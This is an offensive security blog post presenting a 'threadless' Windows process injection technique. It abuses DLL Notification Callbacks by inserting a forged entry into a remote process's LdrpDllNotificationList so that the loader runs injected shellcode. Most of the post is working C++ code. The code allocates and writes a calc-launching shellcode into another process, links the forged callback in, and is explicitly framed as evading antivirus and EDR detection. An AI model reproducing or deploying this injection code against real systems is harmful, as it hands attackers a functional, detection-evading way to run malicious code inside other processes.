Preface

In this blog post we will discuss a new “threadless” process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.

As always, I like to show my methodology and way of thinking whenever I can. A good way of doing that is to share the process of discovering this technique. If you just want the TLDR you can go to the GitHub repo and find it there.

Before we begin however, a bit of background.

Anatomy of Process Injection

Almost every remote process injection follows the same 4 steps:

  1. Obtaining a handle to the remote process
  2. Allocating memory in the remote process
  3. Copy the malicious shellcode to the newly allocated memory in the remote process
  4. Executing the shellcode in the remote process

The most basic implementation is CRT (CreateRemotThread) injection:

  1. OpenProcess (obtaining a handle)
  2. VirtualAllocEx (memory allocation)
  3. WriteProcessMemory (shellcode copying)
  4. CreateRemoteThread (shellcode execution)

There are variants and multiple ways to achieve each step. However, generally speaking almost every variation of remote process injection consists of those 4 steps.

“Threadless” Process Injection

Antiviruses and EDR products have learned to generalize process injection detections by looking for these 4 steps in quick succession – if a process does everything above, then it is most likely up to no good…

A few months ago, @CCob presented a novel concept at BSIDES (ThreadlessInject) which basically offloads the 4th step of the injection process, the execution step, to the remote process. This was accomplished by hooking a function in the remote process so when it calls the hooked function, it triggers our shellcode for us, thus eliminating an entire step in our process.

Another technique that follows the same concept of offloading the execution step to the remote process came out recently by @Kudaes and it’s called EPI. This technique works by changing the Entry Point of a DLL in the PEB of the remote process and pointing it to our shellcode. Once a thread is created or destroyed in the remote process, the Windows Loader will go through the PEB and call each DLL’s Entry Point. This way our shellcode will get executed for us.

The new technique we are releasing today follows the same concept – we will abuse DLL Notification Callbacks to offload the execution of our shellcode in the remote process.

DLL Notification Callbacks

I first stumbled upon this concept when I was diving into Zoom’s anti-DLL-proxying mechanism. A while back, I wrote a blog post about DLL Proxying in tele-conferencing applications such as Teams/Cisco WebEx/Zoom etc., and I noticed that Zoom has a mechanism in place which protects it from being abused with DLL Proxying. It somehow can see which DLL gets loaded and check if it is signed by Zoom or by Microsoft and if it’s not then the user will get a warning message stating that something may not be Kosher and ask if they are sure they want to continue with the execution.

Back in the day, I managed to bypass this by means of memory patching but only recently I started working on the second part of that blog post in which I show how this mechanism can be bypassed (stay tuned for that) and so I decided to further research this topic. This is when I read this blog post where it states that Zoom uses the function LdrRegisterDllNotification to receive a callback before a DLL gets loaded. This blog post is from 2020 so things might have changed, but nevertheless, this got me intrigued. I decided to follow down this rabbit hole in hopes of finding out if this can be misused for offensive purposes.

If we search in MSDN for LdrDllNotification we won’t find a very verbose description of this topic unfortunately, but the gist of it is:

A notification callback function specified with the LdrRegisterDllNotification function. The loader calls this function when a DLL is first loaded.

Meaning, we can use the function LdrRegisterDllNotification to register our function as a callback to be called by the Windows Loader whenever a DLL is loaded (or unloaded). I then learned that some EDR products also use this to get telemetry from DLL load events in user-mode. In this code snipped by @onlymalware we can see how we, as attackers, can un-register all the LdrDllNotification callback functions in our own process to limit the telemetry potentially gathered by EDR products from our process.

This got me thinking, “what if we could register our own malicious callback in a remote process?”

Down The Rabbit Hole We Go

Well, our first problem is that there isn’t a way to use LdrRegisterDllNotification on a remote process. We need to figure out what exactly this function is doing under the hood and see if we can implement this ourselves in a remote process – easy right?

Before we start getting our hands dirty with custom implementations, let's first try to use the function as intended.

If we look at the MSDN page for LdrRegisterDllNotification we will see that it has no associated header file. However, we can import it via LoadLibrary and GetProcAddress.

We also need to define the function ourselves and all its associated structures, luckily we have Google for that (@modexp specifically)

Here is the code I came up with:

C++
#include <Windows.h>
#include <stdio.h>

typedef struct _UNICODE_STR
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR pBuffer;
} UNICODE_STR, * PUNICODE_STR;

// structures and definitions taken from:
// https://modexp.wordpress.com/2020/08/06/windows-data-structures-and-callbacks-part-1/

typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {
    ULONG           Flags;             // Reserved.
    PUNICODE_STR FullDllName;       // The full path name of the DLL module.
    PUNICODE_STR BaseDllName;       // The base file name of the DLL module.
    PVOID           DllBase;           // A pointer to the base address for the DLL in memory.
    ULONG           SizeOfImage;       // The size of the DLL image, in bytes.
} LDR_DLL_LOADED_NOTIFICATION_DATA, * PLDR_DLL_LOADED_NOTIFICATION_DATA;

typedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA {
    ULONG           Flags;             // Reserved.
    PUNICODE_STR FullDllName;       // The full path name of the DLL module.
    PUNICODE_STR BaseDllName;       // The base file name of the DLL module.
    PVOID           DllBase;           // A pointer to the base address for the DLL in memory.
    ULONG           SizeOfImage;       // The size of the DLL image, in bytes.
} LDR_DLL_UNLOADED_NOTIFICATION_DATA, * PLDR_DLL_UNLOADED_NOTIFICATION_DATA;

typedef union _LDR_DLL_NOTIFICATION_DATA {
    LDR_DLL_LOADED_NOTIFICATION_DATA   Loaded;
    LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded;
} LDR_DLL_NOTIFICATION_DATA, * PLDR_DLL_NOTIFICATION_DATA;

typedef VOID(CALLBACK* PLDR_DLL_NOTIFICATION_FUNCTION)(
    ULONG                       NotificationReason,
    PLDR_DLL_NOTIFICATION_DATA  NotificationData,
    PVOID                       Context);

typedef struct _LDR_DLL_NOTIFICATION_ENTRY {
    LIST_ENTRY                     List;
    PLDR_DLL_NOTIFICATION_FUNCTION Callback;
    PVOID                          Context;
} LDR_DLL_NOTIFICATION_ENTRY, * PLDR_DLL_NOTIFICATION_ENTRY;

typedef NTSTATUS(NTAPI* _LdrRegisterDllNotification) (
    ULONG                          Flags,
    PLDR_DLL_NOTIFICATION_FUNCTION NotificationFunction,
    PVOID                          Context,
    PVOID* Cookie);

typedef NTSTATUS(NTAPI* _LdrUnregisterDllNotification)(PVOID Cookie);


// Our callback function
VOID MyCallback(ULONG NotificationReason, const PLDR_DLL_NOTIFICATION_DATA NotificationData, PVOID Context)
{
    printf("[MyCallback] dll loaded: %Z\n", NotificationData->Loaded.BaseDllName);
}

int main()
{
    // Get handle of ntdll
    HMODULE hNtdll = GetModuleHandleA("NTDLL.dll");

    if (hNtdll != NULL) {

        // find the LdrRegisterDllNotification function
        _LdrRegisterDllNotification pLdrRegisterDllNotification = (_LdrRegisterDllNotification)GetProcAddress(hNtdll, "LdrRegisterDllNotification");

        // Register our function MyCallback as a DLL Notification Callback
        PVOID cookie;
        NTSTATUS status = pLdrRegisterDllNotification(0, (PLDR_DLL_NOTIFICATION_FUNCTION)MyCallback, NULL, &cookie);
        if (status == 0) {
            printf("[+] Successfully registered callback\n");
        }
        
        // getchar break
        printf("[+] Press enter to continue\n");
        getchar();

        // Load some dll to trigger our callback function
        printf("[+] Loading USER32 DLL now\n");
        LoadLibraryA("USER32.dll");
    }
}

Running it indeed shows that our callback is getting called:

Now that we can register our own DLL Notification Callback in our own process let’s try to find out where it is stored. Looking at the function definition from MSDN we can see that the only thing we get in return (besides NTSTATUS) is a pointer to a “Cookie”. It is the same “Cookie” that we provide to LdrUnregisterDllNotification in order to remove a specific callback.

I searched for an explanation for this “Cookie” pointer, and this is what I learned:
This “Cookie” pointer is in fact a pointer to an LDR_DLL_NOTIFICATION_ENTRY which holds all the data related to the callback we registered. This includes a pointer to the callback function itself and a pointer to the context (which is not used in this case).
It also holds a LIST_ENTRY structure which points to the rest of the callbacks registered within the process.
All the callbacks registered in the process are stored in a doubly-linked list called “LdrpDllNotificationList“ and are linked together through this LIST_ENTRY structure which points to the previous and following callbacks.
This is similar to the doubly-linked list of “InMemoryOrderModuleList” in the PEB which we use sometimes to find a loaded DLLs and exported function when we want to avoid calling GetModuleHandle and GetProcAddress.
One thing to note is that the head of that “LdrpDllNotificationList“ is in the .data section of NTDLL.

Knowing all that, we can register some dummy DLL Notification Callback, cast the “Cookie” pointer to an LDR_DLL_NOTIFICATION_ENTRY structure, and simply iterate over the doubly-linked list.

Here is the code for doing that:

C++
#include <Windows.h>
#include <stdio.h>

typedef struct _UNICODE_STR
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR pBuffer;
} UNICODE_STR, * PUNICODE_STR;

// structures and definitions taken from:
// https://modexp.wordpress.com/2020/08/06/windows-data-structures-and-callbacks-part-1/

typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {
    ULONG           Flags;             // Reserved.
    PUNICODE_STR FullDllName;       // The full path name of the DLL module.
    PUNICODE_STR BaseDllName;       // The base file name of the DLL module.
    PVOID           DllBase;           // A pointer to the base address for the DLL in memory.
    ULONG           SizeOfImage;       // The size of the DLL image, in bytes.
} LDR_DLL_LOADED_NOTIFICATION_DATA, * PLDR_DLL_LOADED_NOTIFICATION_DATA;

typedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA {
    ULONG           Flags;             // Reserved.
    PUNICODE_STR FullDllName;       // The full path name of the DLL module.
    PUNICODE_STR BaseDllName;       // The base file name of the DLL module.
    PVOID           DllBase;           // A pointer to the base address for the DLL in memory.
    ULONG           SizeOfImage;       // The size of the DLL image, in bytes.
} LDR_DLL_UNLOADED_NOTIFICATION_DATA, * PLDR_DLL_UNLOADED_NOTIFICATION_DATA;

typedef union _LDR_DLL_NOTIFICATION_DATA {
    LDR_DLL_LOADED_NOTIFICATION_DATA   Loaded;
    LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded;
} LDR_DLL_NOTIFICATION_DATA, * PLDR_DLL_NOTIFICATION_DATA;

typedef VOID(CALLBACK* PLDR_DLL_NOTIFICATION_FUNCTION)(
    ULONG                       NotificationReason,
    PLDR_DLL_NOTIFICATION_DATA  NotificationData,
    PVOID                       Context);

typedef struct _LDR_DLL_NOTIFICATION_ENTRY {
    LIST_ENTRY                     List;
    PLDR_DLL_NOTIFICATION_FUNCTION Callback;
    PVOID                          Context;
} LDR_DLL_NOTIFICATION_ENTRY, * PLDR_DLL_NOTIFICATION_ENTRY;

typedef NTSTATUS(NTAPI* _LdrRegisterDllNotification) (
    ULONG                          Flags,
    PLDR_DLL_NOTIFICATION_FUNCTION NotificationFunction,
    PVOID                          Context,
    PVOID* Cookie);

typedef NTSTATUS(NTAPI* _LdrUnregisterDllNotification)(PVOID Cookie);


// Our callback function
VOID MyCallback(ULONG NotificationReason, const PLDR_DLL_NOTIFICATION_DATA NotificationData, PVOID Context)
{
    printf("[MyCallback] dll loaded: %Z\n", NotificationData->Loaded.BaseDllName);
}

// Our second callback function
VOID MySecondCallback(ULONG NotificationReason, const PLDR_DLL_NOTIFICATION_DATA NotificationData, PVOID Context)
{
    printf("[MySecondCallback] dll loaded: %Z\n", NotificationData->Loaded.BaseDllName);
}

int main()
{
    // Get handle of ntdll
    HMODULE hNtdll = GetModuleHandleA("NTDLL.dll");

    if (hNtdll != NULL) {

        // find the LdrRegisterDllNotification function
        _LdrRegisterDllNotification pLdrRegisterDllNotification = (_LdrRegisterDllNotification)GetProcAddress(hNtdll, "LdrRegisterDllNotification");

        // Register our function MyCallback as a DLL Notification Callback
        PVOID cookie;
        NTSTATUS status = pLdrRegisterDllNotification(0, (PLDR_DLL_NOTIFICATION_FUNCTION)MyCallback, NULL, &cookie);
        if (status == 0) {
            printf("[+] Successfully registered first callback\n");
        }

        // Register our function MySecondCallback as a DLL Notification Callback
        status = pLdrRegisterDllNotification(0, (PLDR_DLL_NOTIFICATION_FUNCTION)MySecondCallback, NULL, &cookie);
        if (status == 0) {
            printf("[+] Successfully registered second callback\n");
        }

        // Listing the current process DLL Notification List callbacks
        printf("[+] DLL Notification List:\n");

        // The head of the list is the next link in the chain 
        // since our callback is the last callback in the list
        PLIST_ENTRY head = ((PLDR_DLL_NOTIFICATION_ENTRY)cookie)->List.Flink;
        PLDR_DLL_NOTIFICATION_ENTRY entry = (PLDR_DLL_NOTIFICATION_ENTRY)head;
        do {
            // print the addresses of the LDR_DLL_NOTIFICATION_ENTRY and its callback function
            printf("    %p -> %p\n", entry, entry->Callback);

            // Iterate to the next callback in the list
            entry = (PLDR_DLL_NOTIFICATION_ENTRY)entry->List.Flink;
        } while ((PLIST_ENTRY)entry != head); // Stop when we reach the head of the list again

        printf("\n");

    }
}

In the above code we registered two different DLL Notification Callback functions and then iterated over the doubly-linked list while printing every entry in the list.

Here are the results of the above code:

*Head*ing In The Right Direction

Now that we know how to iterate over the LdrpDllNotificationList in our process we need a way to reliably find the head of the list. At first, I thought I could just register a dummy callback, since I just registered it, it will be the last entry in the list, then the head of the list will be in its List.Flink pointer, since in a doubly-linked list the last entry should always points to the first entry, thus closing some sort of loop.

C++
// Our dummy callback function
VOID DummyCallback(ULONG NotificationReason, const PLDR_DLL_NOTIFICATION_DATA NotificationData, PVOID Context)
{
    return;
}

// Get LdrpDllNotificationList head address
PLIST_ENTRY GetDllNotificationListHead() {
    PLIST_ENTRY head = 0;

    // Get handle of ntdll
    HMODULE hNtdll = GetModuleHandleA("NTDLL.dll");

    if (hNtdll != NULL) {

        // find LdrRegisterDllNotification function
        _LdrRegisterDllNotification pLdrRegisterDllNotification = (_LdrRegisterDllNotification)GetProcAddress(hNtdll, "LdrRegisterDllNotification");

        // find LdrUnregisterDllNotification function
        _LdrUnregisterDllNotification pLdrUnregisterDllNotification = (_LdrUnregisterDllNotification)GetProcAddress(hNtdll, "LdrUnregisterDllNotification");

        // Register our dummy callback function as a DLL Notification Callback
        PVOID cookie;
        NTSTATUS status = pLdrRegisterDllNotification(0, (PLDR_DLL_NOTIFICATION_FUNCTION)DummyCallback, NULL, &cookie);
        if (status == 0) {
            printf("[+] Successfully registered dummy callback\n");

            // Cookie is the last callback registered so its Flink holds the head of the list.
            head = ((PLDR_DLL_NOTIFICATION_ENTRY)cookie)->List.Flink;
            printf("[+] Found LdrpDllNotificationList head: %p\n", head);

            // Unregister our dummy callback function
            status = pLdrUnregisterDllNotification(cookie);
            if (status == 0) {
                printf("[+] Successfully unregistered dummy callback\n");
            }
        }
    }

    return head;
}

Although this approach works, it can have problems with race conditions where another thread may also register its own DLL Notification Callback right before we get the pointer to the head of the list.

So we have another option. Notice how the location of the first entry, the head of the list (aka LdrpDllNotificationList), is in a completely different memory space. If we look at that memory space we will see it's in the .data section of NTDLL. So to reliably get the head of the LdrpDllNotificationList we can iterate over our list the same way we did before, but this time, stop when we find an entry residing within the memory range of the .data section of NTDLL.

For time sake, I left this implementation out of the blog post. I may add it to the final GitHub repo though.

What About Remote Processes?

Up until this point we fiddled with our own process. For remote processes, this gets a bit tricky.

Let's start with the basics though. In order to read the memory of a remote process we can use the function ReadProcessMemory (or its NTAPI equivalent NtReadVirtualMemory).

https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-readprocessmemory

We also need a handle to the remote process, which we can get using OpenProcess (or its NTAPI equivalent NtOpenProcess).

https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess

Next, we need to know where to read from. Here, it's quite simple when you think about it. The LdrpDllNotificationList head resides in the NTDLL's .data section. Every process loads the same NTDLL from disk (duh...) and so the LdrpDllNotificationList head will be in the same place (relative to the base address of the NTDLL) in each process.

EDIT: @x86matthew and @Kharosx0 pointed it out to me on twitter that it is always safe to assume that ntdll is at the same location within all processes and so the next part is not needed. I chose not to change the blog post so others can also learn from this but you can jump to the next section as this is not relevant for us anymore. The code on the GitHub repo has been updated to reflect the changes.

We can check the base address of NTDLL in our own process, get the LdrpDllNotificationList head address in memory, calculate the offset and apply the same offset to the NTDLL base address in the remote process, which we can get using this whacky function:

C++
#include "nt.h" // https://raw.githubusercontent.com/ShorSec/DllNotificationInjection/master/DllNotificationInjection/nt.h

LPVOID GetNtdllBase(HANDLE hProc) {
    
    // find NtQueryInformationProcess function
    NtQueryInformationProcess pNtQueryInformationProcess = (NtQueryInformationProcess)GetProcAddress((HMODULE)GetModuleHandleA("ntdll.dll"), "NtQueryInformationProcess");
    
    // Get the PEB of the remote process
    PROCESS_BASIC_INFORMATION info;
    NTSTATUS status = pNtQueryInformationProcess(hProc, ProcessBasicInformation, &info, sizeof(info), 0);
    ULONG_PTR ProcEnvBlk = (ULONG_PTR)info.PebBaseAddress;

    // Read the address pointer of the remote Ldr
    ULONG_PTR ldrAddress = 0;
    BOOL res = ReadProcessMemory(hProc, ((char*)ProcEnvBlk + offsetof(_PEB, pLdr)), &ldrAddress, sizeof(ULONG_PTR), nullptr);

    // Read the address of the remote InLoadOrderModuleList head
    ULONG_PTR ModuleListAddress = 0;
    res = ReadProcessMemory(hProc, ((char*)ldrAddress + offsetof(PEB_LDR_DATA, InLoadOrderModuleList)), &ModuleListAddress, sizeof(ULONG_PTR), nullptr);

    // Read the first LDR_DATA_TABLE_ENTRY in the remote InLoadOrderModuleList
    LDR_DATA_TABLE_ENTRY ModuleEntry = { 0 };
    res = ReadProcessMemory(hProc, (LPCVOID)ModuleListAddress, &ModuleEntry, sizeof(LDR_DATA_TABLE_ENTRY), nullptr);
    
    LIST_ENTRY* ModuleList = (LIST_ENTRY*)&ModuleEntry;
    WCHAR name[1024];
    ULONG_PTR nextModuleAddress = 0;

    LPWSTR sModuleName = (LPWSTR)L"ntdll.dll";
    
    // Start the forloop with reading the first LDR_DATA_TABLE_ENTRY in the remote InLoadOrderModuleList
    for (ReadProcessMemory(hProc, (LPCVOID)ModuleListAddress, &ModuleEntry, sizeof(LDR_DATA_TABLE_ENTRY), nullptr);
        // Stop when we reach the last entry
        (ULONG_PTR)(ModuleList->Flink) != ModuleListAddress; 
        // Read the next entry in the list
        ReadProcessMemory(hProc, (LPCVOID)nextModuleAddress, &ModuleEntry, sizeof(LDR_DATA_TABLE_ENTRY), nullptr))
    { 

        // Zero out the buffer for the dll name
        memset(name, 0, sizeof(name));

        // Read the buffer of the remote BaseDllName UNICODE_STRING into the buffer "name"
        ReadProcessMemory(hProc, (LPCVOID)ModuleEntry.BaseDllName.pBuffer, &name, ModuleEntry.BaseDllName.Length, nullptr);
        
        // Check if the name of the current module is ntdll.dll and if so, return the DllBase address
        if (wcscmp(name, sModuleName) == 0) {
            return (LPVOID)ModuleEntry.DllBase;
        }

        // Otherwise, set the nextModuleAddress to point for the next entry in the list
        ModuleList = (LIST_ENTRY*)&ModuleEntry;
        nextModuleAddress = (ULONG_PTR)(ModuleList->Flink);
    }
    return 0;
}

With the remote NTDLL base address in our possession we can invoke our GetDllNotificationListHead function to calculate the offset from our NTDLL base address. We can then add this offset to the remote NTDLL base address. This will give us the LdrpDllNotificationList head address of the remote process.

We can modify our old code a bit to allow for reading the DLL Notification Callbacks from a remote process using the LdrpDllNotificationList head address of the remote process.

C++
void PrintDllNotificationList(HANDLE hProc, LPVOID remoteHeadAddress) {
    printf("\n");
    printf("[+] Remote DLL Notification Block List:\n");

    // Allocate memory buffer for LDR_DLL_NOTIFICATION_ENTRY
    BYTE* entry = (BYTE*)malloc(sizeof(LDR_DLL_NOTIFICATION_ENTRY));

    // Read the head entry from the remote process
    ReadProcessMemory(hProc, remoteHeadAddress, entry, sizeof(LDR_DLL_NOTIFICATION_ENTRY), nullptr);
    LPVOID currentEntryAddress = remoteHeadAddress;
    do {

        // print the addresses of the LDR_DLL_NOTIFICATION_ENTRY and its callback function
        printf("    0x%p -> 0x%p\n", currentEntryAddress, ((PLDR_DLL_NOTIFICATION_ENTRY)entry)->Callback);

        // Get the address of the next callback in the list
        currentEntryAddress = ((PLDR_DLL_NOTIFICATION_ENTRY)entry)->List.Flink;

        // Read the next callback in the list
        ReadProcessMemory(hProc, currentEntryAddress, entry, sizeof(LDR_DLL_NOTIFICATION_ENTRY), nullptr);

    } while ((PLIST_ENTRY)currentEntryAddress != remoteHeadAddress); // Stop when we reach the head of the list again

    free(entry);

    printf("\n");
}

int main()
{
    // Get local LdrpDllNotificationList head address
    LPVOID localHeadAddress = (LPVOID)GetDllNotificationListHead();
    printf("[+] Local LdrpDllNotificationList head address: 0x%p\n", localHeadAddress);

    // Get local NTDLL base address
    HANDLE hNtdll = GetModuleHandleA("NTDLL.dll");
    printf("[+] Local NTDLL base address: %p\n", hNtdll);

    // calculate the offset of LdrpDllNotificationList from NTDLL base
    int offsetFromBase = (BYTE*)localHeadAddress - (BYTE*)hNtdll;
    printf("[+] LdrpDllNotificationList offset from NTDLL base: 0x%X\n", offsetFromBase);

    // Open handle to remote process
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 15624);
    printf("[+] Got handle to remote process\n");

    // Get remote NTDLL base address
    LPVOID remoteNtdllBase = GetNtdllBase(hProc);
    LPVOID remoteHeadAddress = (BYTE*)remoteNtdllBase + offsetFromBase;
    printf("[+] Remote LdrpDllNotificationList head address 0x%p\n", remoteHeadAddress);

    // Print the remote Dll Notification List
    PrintDllNotificationList(hProc, remoteHeadAddress);

}

Here are the results. On the right we can see our old code where we registered our two DLL Notification Callbacks and listed them. On the left you can see the code above listing those same callbacks from the remote process.

Writing > Reading

Now that we can read the DLL Notification Callbacks remotely, the road to writing them remotely is quite short.

But first, let's dive into the LDR_DLL_NOTIFICATION_ENTRY structure, specifically its LIST_ENTRY attribute.

C++
typedef struct _LIST_ENTRY {
   struct _LIST_ENTRY *Flink;
   struct _LIST_ENTRY *Blink;
} LIST_ENTRY, *PLIST_ENTRY, *RESTRICTED_POINTER PRLIST_ENTRY;

typedef struct _LDR_DLL_NOTIFICATION_ENTRY {
    LIST_ENTRY                     List;
    PLDR_DLL_NOTIFICATION_FUNCTION Callback;
    PVOID                          Context;
} LDR_DLL_NOTIFICATION_ENTRY, * PLDR_DLL_NOTIFICATION_ENTRY;

As we can see, each entry has an attribute List which is itself a structure of type LIST_ENTRY. This LIST_ENTRY has two attributes:

  1. Flink (Forward Link) which holds a pointer to the next entry in the list
  2. Blink (Backward Link) which holds a pointer to the previous entry in the list

When we use the function LdrRegisterDllNotification what happens under the hood (and I'm simplifying here) is the following:

  1. A new LDR_DLL_NOTIFICATION_ENTRY struct is allocated for the newly created entry
  2. The Callback attribute is set to point to our callback function
  3. The Context attribute is set to point to our provided context (if any)
  4. The List.Blink attribute is set to point to the last LDR_DLL_NOTIFICATION_ENTRY entry in the LdrpDllNotificationList
  5. The last LDR_DLL_NOTIFICATION_ENTRY entry in the LdrpDllNotificationList has its List.Flink changed to point to our newly created entry
  6. The List.Flink attribute is set to point to the head of the LdrpDllNotificationList (The last link in a doubly-linked list should always point to the head of the list).
  7. The LdrpDllNotificationList head has its List.Blink changed to point to our newly created entry

Here is a nice diagram to help clarify this concept. This is taken from GeeksForGeeks post on Doubly-Linked Lists. One difference to note is that in our case, the head and the tail are connected as well, this is what is know as Circular Doubly-Linked Lists.

https://www.geeksforgeeks.org/introduction-and-insertion-in-a-doubly-linked-list/

Now that that's out of the way, let's get started. We will basically implement all of the steps above ourselves. In this specific POC (Piece of Code lol) we will use a simple calc shellcode (from Sektor7) and we will use VirtualAllocEx and WriteProcessMemory as our allocation and memory writing primitives, as OPSEC is out of scope for this blog post (things are already complicated enough without it).

C++
// Pop Calc.exe Shellcode from Sektor7
unsigned char shellcode[276] = { 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x0, 0x0, 0x0, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0xf, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x2, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x1, 0xd0, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x1, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x1, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x41, 0x8b, 0xc, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x1, 0xd0, 0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x48, 0x8d, 0x8d, 0x1, 0x1, 0x0, 0x0, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0xa, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x6, 0x7c, 0xa, 0x80, 0xfb, 0xe0, 0x75, 0x5, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x0, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x0 };

int main()
{
    // Get local LdrpDllNotificationList head address
    LPVOID localHeadAddress = (LPVOID)GetDllNotificationListHead();
    printf("[+] Local LdrpDllNotificationList head address: 0x%p\n", localHeadAddress);

    // Get local NTDLL base address
    HANDLE hNtdll = GetModuleHandleA("NTDLL.dll");
    printf("[+] Local NTDLL base address: 0x%p\n", hNtdll);

    // Calculate the offset of LdrpDllNotificationList from NTDLL base
    int offsetFromBase = (BYTE*)localHeadAddress - (BYTE*)hNtdll;
    printf("[+] LdrpDllNotificationList offset from NTDLL base: 0x%X\n", offsetFromBase);

    // Open handle to remote process
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 9656);
    printf("[+] Got handle to remote process\n");

    // Get remote NTDLL base address
    LPVOID remoteNtdllBase = GetNtdllBase(hProc);
    LPVOID remoteHeadAddress = (BYTE*)remoteNtdllBase + offsetFromBase;
    printf("[+] Remote LdrpDllNotificationList head address 0x%p\n", remoteHeadAddress);

    // Print the remote Dll Notification List
    PrintDllNotificationList(hProc, remoteHeadAddress);

    // Allocate memory for our shellcode in the remote process
    LPVOID shellcodeEx = VirtualAllocEx(hProc, 0, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    printf("[+] Allocated memory for shellcode in remote process: 0x%p\n", shellcodeEx);

    // Write the shellcode to the remote process
    WriteProcessMemory(hProc, shellcodeEx, shellcode, sizeof(shellcode), nullptr);
    printf("[+] Shellcode has been written to remote process: 0x%p\n", shellcodeEx);

    // Create a new LDR_DLL_NOTIFICATION_ENTRY
    LDR_DLL_NOTIFICATION_ENTRY newEntry = {};
    newEntry.Context = NULL;
    
    // Set the Callback attribute to point to our shellcode
    newEntry.Callback = (PLDR_DLL_NOTIFICATION_FUNCTION)shellcodeEx;
    
    // We want our new entry to be the first in the list 
    // so its List.Blink attribute should point to the head of the list
    newEntry.List.Blink = (PLIST_ENTRY)remoteHeadAddress;

    // Allocate memory buffer for LDR_DLL_NOTIFICATION_ENTRY
    BYTE* remoteHeadEntry = (BYTE*)malloc(sizeof(LDR_DLL_NOTIFICATION_ENTRY));

    // Read the head entry from the remote process
    ReadProcessMemory(hProc, remoteHeadAddress, remoteHeadEntry, sizeof(LDR_DLL_NOTIFICATION_ENTRY), nullptr);

    // Set the new entry's List.Flink attribute to point to the original first entry in the list
    newEntry.List.Flink = ((PLDR_DLL_NOTIFICATION_ENTRY)remoteHeadEntry)->List.Flink;

    // Allocate memory for our new entry
    LPVOID newEntryAddress = VirtualAllocEx(hProc, 0, sizeof(LDR_DLL_NOTIFICATION_ENTRY), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("[+] Allocated memory for new entry in remote process: 0x%p\n", newEntryAddress);
    
    // Write our new entry to the remote process
    WriteProcessMemory(hProc, (BYTE*)newEntryAddress, &newEntry, sizeof(LDR_DLL_NOTIFICATION_ENTRY), nullptr);
    printf("[+] Net Entrty has been written to remote process: 0x%p\n", newEntryAddress);

    // Calculate the addresses we need to overwrite with our new entry's address
    // The previous entry's Flink (head) and the next entry's Blink (original 1st entry)
    LPVOID previousEntryFlink = (LPVOID)((BYTE*)remoteHeadAddress + offsetof(LDR_DLL_NOTIFICATION_ENTRY, List) + offsetof(LIST_ENTRY, Flink));
    LPVOID nextEntryBlink = (LPVOID)((BYTE*)((PLDR_DLL_NOTIFICATION_ENTRY)remoteHeadEntry)->List.Flink + offsetof(LDR_DLL_NOTIFICATION_ENTRY, List) + offsetof(LIST_ENTRY, Blink));

    // Overwrite the previous entry's Flink (head) with our new entry's address
    WriteProcessMemory(hProc, previousEntryFlink, &newEntryAddress, 8, nullptr);

    // Overwrite the next entry's Blink (original 1st entry) with our new entry's address
    WriteProcessMemory(hProc, nextEntryBlink, &newEntryAddress, 8, nullptr);

    printf("[+] LdrpDllNotificationList has been modified.\n");
    printf("[+] Our new entry has been inserted.\n");

    // Print the remote Dll Notification List
    PrintDllNotificationList(hProc, remoteHeadAddress);

}

